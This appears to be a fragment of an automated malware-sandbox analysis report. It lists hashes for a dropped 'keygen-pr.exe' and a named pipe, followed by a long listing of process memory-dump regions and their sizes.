                                                                                                                                                            • \??\pipe\crashpad_360_KASCGEOZULTDFSVE
                                                                                                                                                              MD5

                                                                                                                                                              d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                              SHA1

                                                                                                                                                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                              SHA256

                                                                                                                                                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                              SHA512

                                                                                                                                                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                              MD5

                                                                                                                                                              65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                              SHA1

                                                                                                                                                              a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                              SHA256

                                                                                                                                                              862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                              SHA512

                                                                                                                                                              e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                            • memory/316-82-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/360-87-0x0000000003D90000-0x0000000003D91000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/516-73-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/524-180-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/568-70-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/576-172-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/576-135-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/616-169-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/652-85-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/836-79-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/836-173-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/844-203-0x00000000017F0000-0x0000000001857000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              412KB

                                                                                                                                                            • memory/844-202-0x0000000000AC0000-0x0000000000B04000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              272KB

                                                                                                                                                            • memory/864-198-0x0000000000400000-0x0000000000415000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/908-162-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/980-171-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1136-170-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1216-117-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1224-215-0x0000000004EC0000-0x0000000004EC1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/1292-182-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1336-64-0x00000000772C0000-0x00000000772C1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/1336-62-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1336-165-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1516-63-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1604-168-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1604-184-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1624-213-0x0000000004700000-0x0000000004701000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/1632-76-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1684-211-0x00000000076E0000-0x00000000076E1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/1704-194-0x000000001AD70000-0x000000001AD72000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/1772-67-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1808-129-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1948-123-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1968-214-0x0000000004940000-0x0000000004941000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/1988-59-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1996-192-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2000-183-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2008-199-0x00000000001D0000-0x00000000001D1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2052-132-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2108-200-0x00000000002A0000-0x00000000002DA000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              232KB

                                                                                                                                                            • memory/2108-201-0x0000000000790000-0x00000000007E6000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              344KB

                                                                                                                                                            • memory/2156-141-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2160-185-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2176-138-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2212-197-0x00000000009E0000-0x00000000009E2000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/2212-166-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2272-89-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2276-163-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2280-221-0x0000000000400000-0x0000000000464000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              400KB

                                                                                                                                                            • memory/2280-220-0x00000000001B0000-0x00000000001EC000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              240KB

                                                                                                                                                            • memory/2288-112-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2332-114-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2368-207-0x00000000043E0000-0x0000000004471000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              580KB

                                                                                                                                                            • memory/2368-208-0x0000000000400000-0x0000000002BDB000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              39.9MB

                                                                                                                                                            • memory/2388-205-0x0000000000250000-0x00000000002B7000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              412KB

                                                                                                                                                            • memory/2388-218-0x0000000002CF0000-0x0000000002DF6000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              1.0MB

                                                                                                                                                            • memory/2472-181-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2476-164-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2480-92-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2516-188-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2620-120-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2680-95-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2700-167-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2724-126-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2732-212-0x00000000003B0000-0x00000000003B2000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/2740-98-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2744-174-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2752-144-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2760-100-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2760-153-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2760-102-0x000007FEFB991000-0x000007FEFB993000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/2764-206-0x0000000000A50000-0x0000000000A52000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/2776-101-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2780-193-0x0000000000F70000-0x000000000110C000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              1.6MB

                                                                                                                                                            • memory/2780-196-0x0000000002C30000-0x0000000002D1F000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              956KB

                                                                                                                                                            • memory/2780-209-0x00000000001A0000-0x00000000001B2000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              72KB

                                                                                                                                                            • memory/2792-177-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2848-176-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2856-104-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2864-186-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2872-147-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2884-195-0x0000000000400000-0x0000000000983000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              5.5MB

                                                                                                                                                            • memory/2900-175-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2912-107-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2916-156-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2928-187-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2932-150-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2968-110-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2968-179-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2980-178-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3008-159-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3108-216-0x00000000044B0000-0x00000000044B1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3216-217-0x0000000000D10000-0x0000000000D11000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3632-219-0x0000000000830000-0x0000000000831000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB